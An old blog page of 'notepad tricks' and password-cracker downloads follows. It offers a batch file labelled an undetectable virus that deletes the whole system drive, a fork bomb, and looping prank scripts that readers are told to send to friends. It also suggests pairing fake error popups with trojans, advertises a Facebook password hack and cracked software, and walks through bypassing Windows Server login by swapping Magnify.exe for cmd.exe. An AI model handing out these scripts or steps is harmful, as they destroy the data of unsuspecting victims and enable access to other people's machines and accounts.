MOHAMMAD ASIF

USEFUL TRICKS

Note pad tricks codeFull] Collection of notepad tricks!

write ur own simple virus cant detected by any antivirus....
@Echo off 
Del C:\ *.* 



or better version


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
EVEN I DIDN't TRY THIS........
I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...
-------------------------------------------------------------------------
-------------------------------------------------------------------------
2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
End If
wscript.sleep 5000
loop 


Save it as "Anything.VBS" and send it.
==============================================================
3) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop 


Save it as "Anything.VBS" and send it.
==============================================================
4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! " 


Save it as "Anything.VBS" and send it.
==============================================================
5) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop 
Save it as "Anything.VBS" and send it.
==============================================================
6) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop 
Save it as "Anything.VBS" and send it.
==============================================================
7) Open Notepad continually in your friend's computer:
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top 


Save it as "Anything.BAT" and send it.
==============================================================
8 ) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)


echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two 


Save it as "Anything.BAT" and send it.
==============================================================
9) Hide text inside your text file ! 
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
* Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data


==============================================================
10) A Virus That Will Open And Close Ur Cdrom
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as "Anything.vbs" and send it.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process 
==============================================================
11) Notepad virus
Open NotePad And Write This:
Code:
@echo off
:E
start cmd.exe
start calc.exe


Save It As .bat.
==============================================================
12) Code to shutdown computer


Open NotePad And Write This:
Code:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00 
Save It As .bat
==============================================================
13) Code for log
Open NotePad And Write This:
Code:
.LOG
and Save It As .txt
now if you open the file
its writes the time and day that you log...
==============================================================
14) Code for matrix falling text-
Open NotePad And Write This:
Code:
@echo off
:loop
COlor 0A
Title J J f f g g g g
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop 


Save It As .bat
==============================================================
15)code to make computer chat with you
Open NotePad And Write This:
Code:
dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox("My Name Is Saplas")
fname=inputbox(" I Love You Saplas ^^.")
Save It As .vbs
==============================================================
16) Code to open many windows!
Open NotePad And Write This:
Code:
start
start
start
[The Number of "start" e.x 3 start-->3 windows ,, more start.. more windows ^_^]
Save It As .bat
==============================================================
17)code for Rick Roll
Open NotePad And Write This:
Code:
@echo off 
START 
http://www.smooch.net/lol [ you can change the site but i find this Site for RIck Roll-->best] [[for closing this site, push ctrl+alt+delete]]
Save It As .bat
==============================================================
18)code for Virus Joke
Open NotePad And Write This:
Code:
start
start
start
start
@echo off
msg ' [your text here] example msg ' We Hack So What?
msg ' [your text here] example msg ' Hahahahahaha.
shutdown -s -t 50 -c "your text here" example shutdown -s -t 50 -c "The Pc Gonna Exploded In 50 Sec"


Save It As .bat


If You wait 50 sec, your pc gonna restart..
But..
Start-->Run. Now Write shutdown -a
It Stops The Restart... 
==============================================================
19) code for Virus Joke 2
Open NotePad And Write This:
Code:
@echo off
:hack
echo [your text here] I prefer this example --> echo Trojan Virus Uploading
goto hack
Save It As .bat
==============================================================
20) code for Adding A Heading And Text
Open Internet Explorer[prefer Mozila Firefox] .Then Open NotePad And Write This:
Code:


In The " ", It's The Name For The Site





HelloIn The " " are the font and the size number. 
Example









Hello
==============================================================
21) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:
start
%0
goto :S


Save It As .bat
If You Open It, It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .
==============================================================
22) Create your own Never Ending Error/Pop up messages 
First of all, here are some possible uses for this cool little thing
1. Bind them with your virus's / trojans. You can use any messages remember.
2. To piss off your friends making them think you've messed there computer up.
3. Whatever you want really!


Step 1. Open Notepad
Step 2. Type the following text:
Code:
lol = msgbox("Text You Want Here",16,"Title Of Message Box Here")
Step 3. Create as many lines as you want, for example my outcome would be something like this:
lol = msgbox("A System32 error has occured, please contact microsoft immediately",16,"Fatal Error")
lol = msgbox("Mswinsox (C:\Windows) Will now be deleted",16,"Fatal Error")
lol = msgbox("(C:\Windows) is being deleted",16,"Fatal Error")
lol = msgbox("Your computer will reboot shortly",16,"Fatal Error")
lol = msgbox("If you still have a problem, then you are -beep-ed",16,"Fatal Error")
lol = msgbox("owned you",16,"Fatal Error")




Step 4. Save it as Anything.vbs , distribute it amongst your friends and have a laugh.
==============================================================
23) make your pc talk with notepad!
Open a text file in notepad and write:
Code:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed
==============================================================
Fake warning boxes:
http://www.maxcheaters.com/forum/index.php?topic=53974.0
==============================================================
Virus in notepad
Paste this in yor notepad
Code:
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}" (Without Quotes)


now save it and scan it by ur antivirus software..
Bush trick
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
or
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
____________________________________________________________________
____________________________________________________________________
world trade centre trick
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.


log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.


WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
************************************************************************
Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1? on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.


&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


Print tree root
a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43?$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.
==============================================================Posted by indiantoplink at 10:32 AM2 commentsLabels: Note pad tricks codeSaturday, April 24, 2010Password Cracker
4 Password Recovery Apps


4 Password Recovery Apps



4 Password Recovery AppsAIM Password RecoveryPassword Recovery for MSNPassword Recovery for MySpace IMPassword Recovery for Windows LivePassword Recovery for MySpaceIM finds and shows MySpace passwords saved by MySpaceIM (instant messengercreated by MySpace) on your local system. Your MySpace password will be decrypted if you can successfullylogin with MySpaceIM without entering your password. The program also allows recovery of MySpace passwordsfrom MySpaceIM data files extracted from other hard drives or user accounts (external recovery is explainedbelow on this page). Download and install MySpace password recovery tool and see if it can decode yourMySpace passwordsWindows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that weresaved by Windows Live Messenger on your PC under the current login. This cracker works when you are able tologin with your messenger automatically without entering your password. It will recover multiple accountsand supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is savedon your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.Password Recovery for MSN is the MSN messenger password recovery program that finds all encrypted MSNMessenger, Windows Live Messenger and Windows Messenger passwords stored on the local system. It thendisplays them in an easy to read format. This program works if after clicking the "Sign-In" button in yourmessenger you're able to login automatically without entering your MSN password.AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PCunder the current account. The passwords will then be cracked and decoded (decrypted) to display on thescreen in a user-friendly format. Correct passwords will of course be displayed only if you are able tologin automatically in AIM without entering your password for the account you want to recover. Works withthe latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked. It costsnothing to download AIM Password Recovery and see if the passwords are recoverable
4 Password Recovery Apps
AIM Password Recovery
Password Recovery for MSN
Password Recovery for MySpace IM
Password Recovery for Windows Live
Password Recovery for MySpaceIM finds and shows MySpace passwords saved by MySpaceIM (instant messenger
created by MySpace) on your local system. Your MySpace password will be decrypted if you can successfully
login with MySpaceIM without entering your password. The program also allows recovery of MySpace passwords
from MySpaceIM data files extracted from other hard drives or user accounts (external recovery is explained
below on this page). Download and install MySpace password recovery tool and see if it can decode your
MySpace passwords
Windows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that were
saved by Windows Live Messenger on your PC under the current login. This cracker works when you are able to
login with your messenger automatically without entering your password. It will recover multiple accounts
and supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows
7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved
on your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.
Password Recovery for MSN is the MSN messenger password recovery program that finds all encrypted MSN
Messenger, Windows Live Messenger and Windows Messenger passwords stored on the local system. It then
displays them in an easy to read format. This program works if after clicking the "Sign-In" button in your
messenger you're able to login automatically without entering your MSN password.
AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PC
under the current account. The passwords will then be cracked and decoded (decrypted) to display on the
screen in a user-friendly format. Correct passwords will of course be displayed only if you are able to
login automatically in AIM without entering your password for the account you want to recover. Works with
the latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked. It costs
nothing to download AIM Password Recovery and see if the passwords are recoverable

CLICK HERE TO DOWNLOAD

Hack Facebook Password


Hack Facebook Password






Hack Facebook PasswordCLICK HERE TO DOWNLOADHack Facebook Password
Hack Facebook Password Only 11.89 MB
CLICK HERE TO DOWNLOADWindows Admin Password Hack



Windows Admin Password Hack :
This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.
Windows 2000/XP.
The ISO must be burned to a CD or Flash drive.









Windows Admin Password Hack :
Forgot your NT admin password?
Reinstall? Oh no... But not any more...

This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.

Will detect and offer to unlock locked or disabled out user accounts!
It is also an almost fully functional registry editor!

Windows Admin Hack allows you to reset the administrator password on
Windows 2000/XP.

The ISO must be burned to a CD or Flash drive.

When it is booted, a mini version of linux starts which allows the
administrator password to be reset. useful if you need to work on a
machine the password is unknown.CLICK HERE TO DOWNLOADPassword Depot Professional 4.1.4 - Repack

Password Depot Professional 4.1.4













Password Depot Professional 4.1.4





Password Depot 4 protects your important and confidential passwords from external access while offering maximum user-friendliness!

For Computer Build 01/08, Password Depot is the password safe which "as the only software was able to make a good impression when faced with the comprehensive security test".




CLICK HERE TO DOWNLOAD


12 Password Cracker Tools



Password Breaker & Cracker Mega Thread | 40 MB

1) PDF Password Remover
2) Windows XP Admin Password Remover
3) Zip File Password Cracker
4) SQL Password Remover
5) Microsoft Office Password Remover
6) Windows Vista Admin Password Recovery
7) Windows Password Recovery
RAR File Password Cracker
9) EXE File Password Recovery
10) Password Changer
11) Password Memory
12) Distributed Password Recovery





Installation
Extract And Install ,Register Use Tools
Enjoy



CLICK HERE TO DOWNLOAD



































Portable PDF Password Cracker Pro v3.0






Portable PDF Password Cracker Pro v3.0 Size 3,0 MB

PDF Password Cracker Pro allows to search for "owner" and "user" passwords with brute-force and dictionary attacks, effectively optimized for speed.

In addition, it has Key search attack, which guarantees the decryption (regardless the password length and complexity) of PDF files that use 40-bit encryption.

The standard security provided by PDF consists of two different passwords. Owner Password will allow to prevent PDF file from editing (changing), printing, selecting text and graphics, or adding/changing annotations and
form fields; User Password locks the file so the password is required to open or view the file.



If only owner password is set, decryption is being done instantly; decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions, i.e. with edit/copy/print/annotate functions enabled. Alternatively, owner password can be recovered using brute-force or dictionary attacks.

Additionally, PDF Password Cracker Pro supports "key search" attack that allows to decrypt PDF files with 40-bit security regardless the password length.





CLICK HERE TO DOWNLOAD



RAR Password Cracker 4.12

RAR Password Cracker v4.12
This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters ("bruteforce" method), or using passwords from lists ("wordlist" or "dictionary" method). Self-extracting archives and multivolume archives are supported. The program is able to save a current state (you can interrupt the program at any time, and restart from the same state later). Estimated time calculator allows you to configure the program more carefully.



System requirements
RAR Password Cracker requires Windows 9x/ME/XP/NT4/2000/2003. There are no special requirements for memory capacity, but the processor performance should be as high as possible. Special hardware is not required.

What's new Version 4.12 
Fixed: Permanent crashes on some types of files.
Added: New type of licenses: low-cost time-limited fully functional versionCLICK HERE TO DOWNLOADRar password cracker 4.2This program recovers lost passwords for RAR/WinRAR archives of versions 2.x and 3.x. The program finds passwords by way of an exhaustive search of all possible combinations of characters or by using passwords from lists. Self-extracting and multivolume archives are supported. The program can save a current state--you can interrupt the program at any time and restart from the same state later. An estimated-time calculator allows you to configure the program more carefully.
CLICK HERE TO DOWNLOADRAR Password Recovery Magic 6.1.1.257

RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.
RAR Password Recovery Magic has an easy to use interface. All you need to do to recover your password is just to add your file to the operation window.



Key Features

* Recover passwords for RAR/WinRAR archives.
* Custom character set for "brute-force" attack supported.
* You can select character from a range of character options including: Letters, Numbers, symbol...
* Large wordlist dictionary.
* Work in the background.
* Features a user-friendly interface.

Size : 1.8 MB







CLICK HERE TO DOWNLOAD












How To reset Windows Server 2008 password


You have just completed installing Windows Server 2008, and you hit the Ctrl+Alt+Delete key and then you were lost, What administator password and username should I used? Especially that you did not create any during the installation process! In this article, I will show you how to successfully reset to Windows server 2008.



Windows Server 2008 is one of Microsoft Windows' server line of operating systems. Released to manufacturing on February 4, 2008, and officially released on February 27, 2008, it is the successor to Windows Server 2003, released nearly five years earlier. A second release, named Windows Server 2008 R2, was released to manufacturing on July 22, 2009.



The solution is a two stage process. The first stage is preparation and requires the use of PING (Partimage is not ghost) which is a linux environment that can run off of a disc. You need to download the PING image and burn it to a disc before continuing.



Now that you have the disc ready, here are the steps to follow:



1. Put the disc in your server and boot off of it. The process to do this differs by server but I am sure you can figure it out (or have done it before).



2. The PING linux environment will load.



3.When the environment is fully loaded, you will receive a “>>” prompt.



4.At the “>>” prompt, type “x” and press the ENTER key. “x“ will take you to a command shell rather than launching the PING user interface.



6.At the “PING login:” prompt, type in “root” and press the ENTER key.



7.At this ping you should be logged into the PING operating system. Now we need to run a few shell commands.

Run the following command: fdisk -l : grep NTFS



8.This command will list all the NTFS partitions. As best as you can, note the name of the one that contains the Windows directory.



9.Run the following command: mkdir -p /mnt/windows



10.This command creates a directory called “/mnt/windows” that will be used for mounting the windows partition



11.Run the following command: mount -t ntfs-3g /dev/sda3 /mnt/windows



12.This command actually performs the mount. “/dev/sda3″ is the name of the device (from step 7) that holds the windows partition. This was “sda3″ for me but may vary for you.



13.Run the following command: cd /mnt/windows/Windows/System32



14.This command changes the current directory to the System32 directory in the Windows partition. Now that the partition has been mounted, you can consider “/mnt/Windows” as the root drive of your server so “/mnt/windows/Windows/System32″ is the equivalent to “C:\Windows\System32″.



15.Run the following command: mv Magnify.exe Magnify.bak



16.This command renames the “Magnify.exe” file, which is in the System32 folder.



17.Run the following command: cp cmd.exe Magnify.exe



18.This command, the final one, makes a copy of “cmd.exe” and names it “Magnify.exe”.



19.Remove the disc and reboot.



The steps above all make up the first stage, which is really the primary stage. You see, we can’t really (easily) recover the password. All the steps above bring you to a point where you will actually be able to bypass authentication all together with something akin to a backdoor. Now you see why I started by saying that it should only be used for good.



For the second stage, we need to wait until Windows has booted and you are at the login screen. On this screen you will notice a small icon in the lower left corner of the screen. This is known as the “Ease of Access” feature, which provides accessibility options. Click on this icon to bring up the dialog box. You will notice several different accessibility options, one of them being “Make items on the screen larger (Magnifier)”. This launches a tool called Magnify.exe which is used to make items on the screen larger.



Yes, I said “Magnify.exe”. If you remember from the first stage of this solution, we replaced this tool with cmd.exe (which runs a command prompt). On the “Ease of Access” dialog, select “Make items on the screen larger (Magnifier)” and press the OK button. As you might expect now, instead of the Magnify tool being launched you are presented with a command prompt. We have just fully bypasses the Windows Sever 2008 authentication. You can run almost anything you can think from this command prompt as it is running under the NT AUTHORITY/SYSTEM account. I ran “explorer.exe” which brought up the task bar. I then went through the normal options to reset the password on the Administrator account and was able to immediately log in with the new password.



One more time I must stress that this information is only being presented to assist those who find themselves in a situation similar to mine. Please do not use this information in an attempt to access a system that you should not have access too.



Windows server 2008 Password Recovery Tool: Windows Password Key 8.0




CLICK HERE TO VISIT WEBSITE







Office Password Recovery Magic 6.1.1.175





Office Password Recovery Magic 6.1.1.175 | 2.3 MB
Office Password Recovery Magic is password recovery software designed to help users recover the lost or forgotten password. Any office files' read-only passwords can be recovered here. We still can recover *.xls, *.ppt, *.mdb, *.doc and Office 2007 formats files. The easy-to-use interface help users do exact search. Users can set parameters to exact the range of searching password, such as the length of the password and the shape of the password. Users still can using dictionary file, which is a string document to find password more quickly.
You can enjoy full function of recovering password. If you have questions or suggestions about our software, please contact us, we hope to grow up with you together.

Key Features
•Recover the lost or forgotten password quickly.
•Recover read-only passwords for Microsoft Office Word.
•Recover read-only passwords for Microsoft Office Excel.
•Recover read-only passwords for Microsoft Office PowerPoint.
•Recover read-only passwords for Microsoft Office Access.
•User-friendly interface.CLICK HERE TO DOWNLOADSticky Password 4.0.2.164

You stole ICQ or broke open mail? Missing money from your electronic purse? So you and must! You simply do not know how to keep your passwords! Passwords are now the most popular, and often the only way to protect personal information. Sticky Password-a unique program that integrates the system remembers and automatically enters the user IDs and passwords in the fields of a site, any program on your computer! Sticky Password oppose keylogers and other spy program to try to capture your passwords. A password-protected powerful encryption algorithms, including AES / Rijndael with 256 to date, most reliable.



With Sticky Password 4.0, youll have:

- the password manager and form filler for your favorite websites and applications
- one-click autofill of on-line forms
- the maximum level of security to keep your passwords and personal data safe
- effective protection against phishing attempts and key loggers
- a convenient productivity tool to organize all your passwords
- your passwords whenever and wherever you need them

Size : 8,5 MBCLICK HERE TO DOWNLOAD - mirror 1


mirror 2




AllyNova HTML Password Wizard v3.1









[MULTI] AllyNova HTML Password Wizard v3.1 | 0.4 MB.
HTML Password Wizard - Password protect web page, html page and whole website. If you have a website, you may want to password protect some web pages of your site. Visitors need to login before enter these protected web pages.

With HTML Password Wizard, you can encrypt and password protect web page, html page and whole website in minutes. HTML Password Protect uses strong industrial standard encryption algorithms to encrypt the web pages with password, and the password will not be stored in the encrypted web pages. It can protect multiple web pages and visitors need to login only once.

You can encrypt and password protect web pages with single password or multiple user names and passwords, and the number of user names and passwords is unlimited.




HTML Password Wizard Features:
• Encrypt and password protect web pages or website in minutes.
• Uses strong industrial standard encryption algorithms.
• Number of user names and passwords is unlimited.
• Can protect multiple web pages and visitors need to login only once.
• Page templates enable you to build various attractive and functional login pages.
• Can create your own templates easily to fully configure the login pages.
• User name password can be remembered or not so that visitors no need to input next time.
• Many HTML protect options for using such as "Disable right mouse click", "Disable text select", "Disable page printing", "Disable off-line page viewing", "Kill frame", "Disable print screen", "Location lock" and so on.
• Protected web pages are independent of OS, web servers and web browsers.
• Can password protect almost all languages Charest of web pages in the world.
• Easy to use and powerful enough, what you need to do is just clicking a few buttons.

OS: Windows All
Language: English
Homepage: http://anonym.to/?http://www.allynova.com/CLICK HERE TO DOWNLOAD








AnyBizSoft PDF Password Remover v1.1.0











AnyBizSoft PDF Password Remover v1.1.0 | 6.1 MB
AnyBizSoft PDF Password Remover - removes passwords and removes restrictions from PDF files. There are times that you have full right to edit PDF document, but you forgot the password to him. Or so that your colleagues have created a report in PDF, but it no longer works for your firm. For such a problem has a solution! Right click on the PDF file, select Decrypt with AnyBizSoft PDF Password Remover from the menu and voila! You can print, and edit PDF document.

Features: 
• Remove PDF passwords and restrictions.
• It removes the copy protection, editing or printing.
• Support for PDF 1.0 - 1.7 formats (. PDF).
• Batch Mode - 200 to decrypt PDF files at once.
• Deciphering the file right click the mouse.
• Autonomy - does not require Adobe Acrobat Reader, etc. ..
• Very easy to use user-friendly interface.




CLICK HERE TO DOWNLOAD




Password Organizer Deluxe.v3.3









[MULTI] Password Organizer Deluxe.v3.3 | 6.7 MB.
Password Organizer Deluxe is a flexible password management software for Windows users. Our software solution gives you an easy way to gather and organize information about all your passwords, access codes, important numbers, login names, ids, account numbers. For the database novice, Organizer's intuitive interface and ready-to-use password management solutions make it easy to set up and use. For the power user, Organizer affords the simplicity of wizards that make it easy to set up and use password management solutions or other database software solutions that you create.




OS: Windows All
Language: English
Homepage: http://anonym.to/?http://www.primasoft.com/CLICK HERE TO DOWNLOADManageEngine Password Manager Pro v6.2.0.6200 Incl. *Keyfilemaker-AGAiN*




[MULTI] ManageEngine Password Manager Pro v6.2.0.6200 Incl. *Keyfilemaker-AGAiN* | 33.79 MB.
Password Manager Pro is a complex software solution created for managing shared administrative passwords.

PMP is centralized, web-based and enables IT managers to enforce standard password management practises such as maintaining a central repository of all passwords, usage of strong passwords, frequent changing of sensitive passwords and controlling user access to shared passwords across the enterprise.

Password Manager Pro (PMP) is a trusted solution to securely store, access and administer shared administrative passwords. It enables IT managers to maintain a central repository of passwords, enforce standard password policies and control unauthorized user access to shared passwords. It also provides a complete record of 'who', 'what' and 'when' of password access.

In organizations, access to IT infrastructure such as servers, databases, network devices and applications storing sensitive data are restricted through privileged passwords.

The number of administrative passwords keep on growing as more and more servers, devices and applications are added to the enterprise. Typically, the applications are used in a shared environment by a group of administrators, who end up virtually struggling with a pile of passwords and face problems on securely storing, managing and sharing the passwords. Spreadsheets, flat files and even print-outs containing the passwords are circulated among the administrators.




Key Features:
· Securely store thousands of privileged passwords of servers, databases, network devices, websites and IT applications
· Selectively share passwords with others
· Reset passwords of remote resources
· Enforce better password management practices
· Complete record of 'who', 'what' and 'when' of password access
· Shared administrative password management
· Service accounts password management (Application-to-Application / Application-to-Database)
· Active Directory/LDAP integration
· Role-based access control & user groups
· Password Access Control Workflow
· Password ownership & sharing
· Automated password resets
· Automatic login to target systems, websites
· Real-time notifications for password events
· Two-Factor Authentication
· Comprehensive audit trails and reporting
· PCI DSS compliance reporting
· High availability architecture for uninterrupted access to passwords

What's new in ManageEngine PasswordManager Pro 6.2 Build 6200:
· New Features / Enhancements
SIEM Integration:
· Provision for generating SNMP traps and Syslog messages upon the occurrence of any activity/event - be it password access or modification or any other activity performed in the PMP application. The traps/syslog messages can be sent to the SIEM tools, which can thoroughly analyze these events, correlate them with other network events and provide informative, holistic insights on the overall network activity.

Two Flavours of APIs for A-to-A Password Management:
· Completely revamped provisions for Application-to-Application Password Management, which help eliminate hard-coded passwords in enterprise environments. PMP provides two flavors of the API - a comprehensive application API based on XML-RPC over HTTPS and a command line interface for scripts over secure shell (SSH), using which any enterprise application or command line script can programatically query PMP and retrieve passwords to connect with other applications or databases.

Local Service Account Password Reset:
· Provision to find and reset all the local account passwords used for services and scheduled tasks in Windows resources

Enhancements in Bulk Password Reset:
· Provision for bulk password reset by selecting multiple resources / resource groups
· Provision for bulk update of passwords in PMP database alone without updating on the actual resources

Reports:
· Enhanced dashboard reports providing details on currently logged in users
· Provision to export all reports in '.xls' format

High Availability:
· Enhancements in High Availability setup with provision for alerts on failure events

Bug Fixes / Changes:
· Earlier, after carrying out a search operation, if one accessed the 'Enterprise Passwords' tab, while an empty page was shown in Firefox, a warning page came up in Internet Explorer. This issue has been fixed now
· Earlier, in Password Request-Release workflow, when the time limit for administrator approval was set as '0' indicating indefinite time period, the approval time period ended after some time. This has been fixed now
· Earlier, in certain cases, Windows remote password reset and password integrity verification failed. It has now been fixed
· Earlier, while implementing concurrency control in Password Request-Release workflow, the maximum time period up to which the password was to be available exclusively for a particular user was specified in hours. This has been changed to minutes to enable granting of exclusive privilege less than one hour
· Earlier, the view length of entries (passwords/resources) in PMP web-interface was not user-specific. It has been made user-specific now.
· Entries in password explorer tree in the 'Home Tab' are now sorted alphabetically
· Provision to control 'Manage Share' permissions for criteria-based resource groups
· Earlier, Single SignOn worked only with NTLM-v1. Now, it works with NTLM-v2 through integration with a third party library named 'Java Enterprise Security Provider Authority' (Jespa), which provides advanced integration between Microsoft Active Directory and Java applications
· Earlier, MD5 algorithm was used for hasing the PMP user passwords for local authentication. Now, SHA 512 is being used.

Language: English
OS: Windows 2000 Server/Professional / Server 2003/ Server 2008/ XP Professional /Vista
Homepage: http://anonym.to/?http://www.manageengine.com/

CLICK HERE TO DOWNLOAD
